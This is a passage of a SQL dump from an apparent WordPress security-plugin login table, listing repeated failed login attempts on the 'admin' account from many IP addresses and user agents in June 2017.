(102066, 1498369871.213092, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102067, 1498372274.822949, 1, 'loginFailValidUsername', 'admin', 1, 3411540890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102068, 1498372276.458533, 1, 'loginFailValidUsername', 'admin', 1, 3411540890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102069, 1498372543.145270, 1, 'loginFailValidUsername', 'admin', 1, 1519446478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102070, 1498372544.213921, 1, 'loginFailValidUsername', 'admin', 1, 1519446478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102071, 1498373563.690077, 1, 'loginFailValidUsername', 'admin', 1, 1461532200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102072, 1498373564.801463, 1, 'loginFailValidUsername', 'admin', 1, 1461532200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102073, 1498377155.119957, 1, 'loginFailValidUsername', 'admin', 1, 1549067217, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102074, 1498377308.963039, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102075, 1498377660.440700, 1, 'loginFailValidUsername', 'admin', 1, 1933737899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102076, 1498377662.073791, 1, 'loginFailValidUsername', 'admin', 1, 1933737899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102077, 1498383988.769811, 1, 'loginFailValidUsername', 'admin', 1, 1530341882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102078, 1498385029.603638, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102079, 1498388809.169085, 1, 'loginFailValidUsername', 'admin', 1, 1241418658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102080, 1498388811.158190, 1, 'loginFailValidUsername', 'admin', 1, 1241418658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102081, 1498389387.231976, 1, 'loginFailValidUsername', 'admin', 1, 1566014399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102082, 1498389388.276862, 1, 'loginFailValidUsername', 'admin', 1, 1566014399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102083, 1498392561.760232, 1, 'loginFailValidUsername', 'admin', 1, 1315727755, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102084, 1498393308.727569, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102085, 1498394814.889550, 1, 'loginFailValidUsername', 'admin', 1, 2966543401, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102086, 1498394816.456028, 1, 'loginFailValidUsername', 'admin', 1, 2966543401, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102087, 1498395875.210886, 1, 'loginFailValidUsername', 'admin', 1, 1303385686, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102088, 1498395876.555470, 1, 'loginFailValidUsername', 'admin', 1, 1303385686, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102089, 1498401373.165791, 1, 'loginFailValidUsername', 'admin', 1, 657073663, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102090, 1498401377.080770, 1, 'loginFailValidUsername', 'admin', 1, 657073663, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102091, 1498401525.564155, 1, 'loginFailValidUsername', 'admin', 1, 1329113047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102092, 1498401526.825140, 1, 'loginFailValidUsername', 'admin', 1, 1329113047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102093, 1498401789.344461, 1, 'loginFailValidUsername', 'admin', 1, 1744435633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102094, 1498401790.572608, 1, 'loginFailValidUsername', 'admin', 1, 1744435633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102095, 1498402631.762053, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102096, 1498404391.222234, 1, 'loginFailValidUsername', 'admin', 1, 1422259166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102097, 1498404392.199868, 1, 'loginFailValidUsername', 'admin', 1, 1422259166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102098, 1498406400.294121, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102099, 1498406400.622209, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102100, 1498406400.930388, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102101, 1498406401.253950, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102102, 1498406401.569914, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102103, 1498406401.883783, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102104, 1498406402.193443, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102105, 1498406402.500756, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102106, 1498406402.810403, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102107, 1498406403.129799, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102108, 1498406403.440621, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102109, 1498406403.748383, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102110, 1498406404.058886, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102111, 1498406404.368091, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102112, 1498406404.680730, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102113, 1498406404.997048, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102114, 1498406405.306683, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102115, 1498406405.614241, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102116, 1498406405.921263, 1, 'loginFailValidUsername', 'admin', 1, 1255184110, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(102117, 1498406687.928450, 1, 'loginFailValidUsername', 'admin', 1, 1460179053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102118, 1498406688.934697, 1, 'loginFailValidUsername', 'admin', 1, 1460179053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102119, 1498407283.448380, 1, 'loginFailValidUsername', 'admin', 1, 95219703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102120, 1498407284.765373, 1, 'loginFailValidUsername', 'admin', 1, 95219703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102121, 1498408310.175878, 1, 'loginFailValidUsername', 'admin', 1, 1332972736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102122, 1498409675.261536, 1, 'loginFailValidUsername', 'admin', 1, 1176434257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102123, 1498409676.425670, 1, 'loginFailValidUsername', 'admin', 1, 1176434257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102124, 1498411046.562574, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102125, 1498411402.341250, 1, 'loginFailValidUsername', 'admin', 1, 87064144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102126, 1498411403.638121, 1, 'loginFailValidUsername', 'admin', 1, 87064144, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102127, 1498411593.284562, 1, 'loginFailValidUsername', 'admin', 1, 3075663157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102128, 1498411594.500297, 1, 'loginFailValidUsername', 'admin', 1, 3075663157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102129, 1498412516.780270, 1, 'loginFailValidUsername', 'admin', 1, 1504019374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102130, 1498413084.279455, 1, 'loginFailValidUsername', 'admin', 1, 3127517827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102131, 1498414106.661850, 1, 'loginFailValidUsername', 'admin', 1, 3000802076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102132, 1498414108.109414, 1, 'loginFailValidUsername', 'admin', 1, 3000802076, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102133, 1498415662.838049, 1, 'loginFailValidUsername', 'admin', 1, 1458347419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102134, 1498415663.832427, 1, 'loginFailValidUsername', 'admin', 1, 1458347419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102135, 1498415976.289800, 1, 'loginFailValidUsername', 'admin', 1, 1127030815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102136, 1498417603.333859, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102137, 1498417769.175561, 1, 'loginFailValidUsername', 'admin', 1, 1393206065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102138, 1498417770.239064, 1, 'loginFailValidUsername', 'admin', 1, 1393206065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102139, 1498417878.946215, 1, 'loginFailValidUsername', 'admin', 1, 1276182236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102140, 1498417880.094962, 1, 'loginFailValidUsername', 'admin', 1, 1276182236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102141, 1498419903.296132, 1, 'loginFailValidUsername', 'admin', 1, 759219118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102142, 1498420669.470220, 1, 'loginFailValidUsername', 'admin', 1, 3212005169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102143, 1498420670.899700, 1, 'loginFailValidUsername', 'admin', 1, 3212005169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102144, 1498423493.511204, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102145, 1498424503.254493, 1, 'loginFailValidUsername', 'admin', 1, 622414627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102146, 1498424504.246884, 1, 'loginFailValidUsername', 'admin', 1, 622414627, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102147, 1498429152.086723, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102148, 1498429980.050358, 1, 'loginFailValidUsername', 'admin', 1, 1484276859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102149, 1498433961.436861, 1, 'loginFailValidUsername', 'admin', 1, 1348626918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102150, 1498434923.980242, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102151, 1498436983.551828, 1, 'loginFailValidUsername', 'admin', 1, 2042128290, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102152, 1498440301.394093, 1, 'loginFailValidUsername', 'admin', 1, 2038480649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102153, 1498440303.092167, 1, 'loginFailValidUsername', 'admin', 1, 2038480649, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102154, 1498446382.148072, 1, 'loginFailValidUsername', 'admin', 1, 2818125773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102155, 1498446384.251963, 1, 'loginFailValidUsername', 'admin', 1, 2818125773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102156, 1498453858.194492, 1, 'loginFailValidUsername', 'admin', 1, 2637301790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102157, 1498453859.495400, 1, 'loginFailValidUsername', 'admin', 1, 2637301790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102158, 1498454826.000827, 1, 'loginFailValidUsername', 'admin', 1, 2197852166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102159, 1498454827.390536, 1, 'loginFailValidUsername', 'admin', 1, 2197852166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102160, 1498455441.164093, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102161, 1498462773.037877, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102162, 1498464276.058464, 1, 'loginFailValidUsername', 'admin', 1, 2994790691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102163, 1498464277.238497, 1, 'loginFailValidUsername', 'admin', 1, 2994790691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102164, 1498465903.211928, 1, 'loginFailValidUsername', 'admin', 1, 717868642, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102165, 1498465904.516020, 1, 'loginFailValidUsername', 'admin', 1, 717868642, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102166, 1498466958.626881, 1, 'loginFailValidUsername', 'admin', 1, 792045249, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102167, 1498468132.948212, 1, 'loginFailValidUsername', 'admin', 1, 1976968246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102168, 1498468135.261592, 1, 'loginFailValidUsername', 'admin', 1, 1976968246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102169, 1498468693.932738, 1, 'loginFailValidUsername', 'admin', 1, 1308079525, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224'),
(102170, 1498469977.759742, 1, 'loginFailValidUsername', 'admin', 1, 1609389519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102171, 1498469979.676956, 1, 'loginFailValidUsername', 'admin', 1, 1609389519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102172, 1498470698.113354, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102173, 1498471538.878021, 1, 'loginFailValidUsername', 'admin', 1, 3373558060, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102174, 1498471540.174466, 1, 'loginFailValidUsername', 'admin', 1, 3373558060, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102175, 1498473132.118204, 1, 'loginFailValidUsername', 'admin', 1, 1327704679, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102176, 1498477987.191233, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102177, 1498478043.841939, 1, 'loginFailValidUsername', 'admin', 1, 3236228209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102178, 1498478045.262751, 1, 'loginFailValidUsername', 'admin', 1, 3236228209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102179, 1498478642.120964, 1, 'loginFailValidUsername', 'admin', 1, 627626064, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102180, 1498478643.277050, 1, 'loginFailValidUsername', 'admin', 1, 627626064, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102181, 1498481058.106913, 1, 'loginFailValidUsername', 'admin', 1, 1315218080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102182, 1498481059.308700, 1, 'loginFailValidUsername', 'admin', 1, 1315218080, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102183, 1498481622.266762, 1, 'loginFailValidUsername', 'admin', 1, 3194233571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102184, 1498481626.381727, 1, 'loginFailValidUsername', 'admin', 1, 3194233571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102185, 1498481654.274335, 1, 'loginFailValidUsername', 'admin', 1, 1733134504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102186, 1498481655.534595, 1, 'loginFailValidUsername', 'admin', 1, 1733134504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102187, 1498483774.527152, 1, 'loginFailValidUsername', 'admin', 1, 1768401889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102188, 1498483775.625353, 1, 'loginFailValidUsername', 'admin', 1, 1768401889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102189, 1498485910.306382, 1, 'loginFailValidUsername', 'admin', 1, 1348615251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102190, 1498485911.479771, 1, 'loginFailValidUsername', 'admin', 1, 1348615251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102191, 1498486556.968755, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102192, 1498487358.008650, 1, 'loginFailValidUsername', 'admin', 1, 2058414788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102193, 1498487359.380609, 1, 'loginFailValidUsername', 'admin', 1, 2058414788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102194, 1498487653.425575, 1, 'loginFailValidUsername', 'admin', 1, 1781745196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102195, 1498487654.717545, 1, 'loginFailValidUsername', 'admin', 1, 1781745196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102196, 1498489606.466936, 1, 'loginFailValidUsername', 'admin', 1, 2631890677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102197, 1498489607.724640, 1, 'loginFailValidUsername', 'admin', 1, 2631890677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102198, 1498491193.830080, 1, 'loginFailValidUsername', 'admin', 1, 3075677919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102199, 1498491195.594792, 1, 'loginFailValidUsername', 'admin', 1, 3075677919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102200, 1498491729.689655, 1, 'loginFailValidUsername', 'admin', 1, 3337960456, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; .NET CLR 3.5.21022; SLCC1; Zune 4.0)'),
(102201, 1498492922.493665, 1, 'loginFailValidUsername', 'admin', 1, 3036146608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102202, 1498492924.969355, 1, 'loginFailValidUsername', 'admin', 1, 3036146608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102203, 1498494001.297497, 1, 'loginFailValidUsername', 'admin', 1, 3590217870, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102204, 1498494475.421998, 1, 'loginFailValidUsername', 'admin', 1, 1985718980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102205, 1498494476.832787, 1, 'loginFailValidUsername', 'admin', 1, 1985718980, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102206, 1498494877.462148, 1, 'loginFailValidUsername', 'admin', 1, 1951063074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102207, 1498494878.674276, 1, 'loginFailValidUsername', 'admin', 1, 1951063074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102208, 1498495522.788278, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102209, 1498496800.862246, 1, 'loginFailValidUsername', 'admin', 1, 1267460864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102210, 1498496802.282905, 1, 'loginFailValidUsername', 'admin', 1, 1267460864, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102211, 1498501763.093588, 1, 'loginFailValidUsername', 'admin', 1, 2317641320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102212, 1498501764.530774, 1, 'loginFailValidUsername', 'admin', 1, 2317641320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102213, 1498501983.200616, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(102214, 1498502672.018294, 1, 'loginFailValidUsername', 'admin', 1, 644873987, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
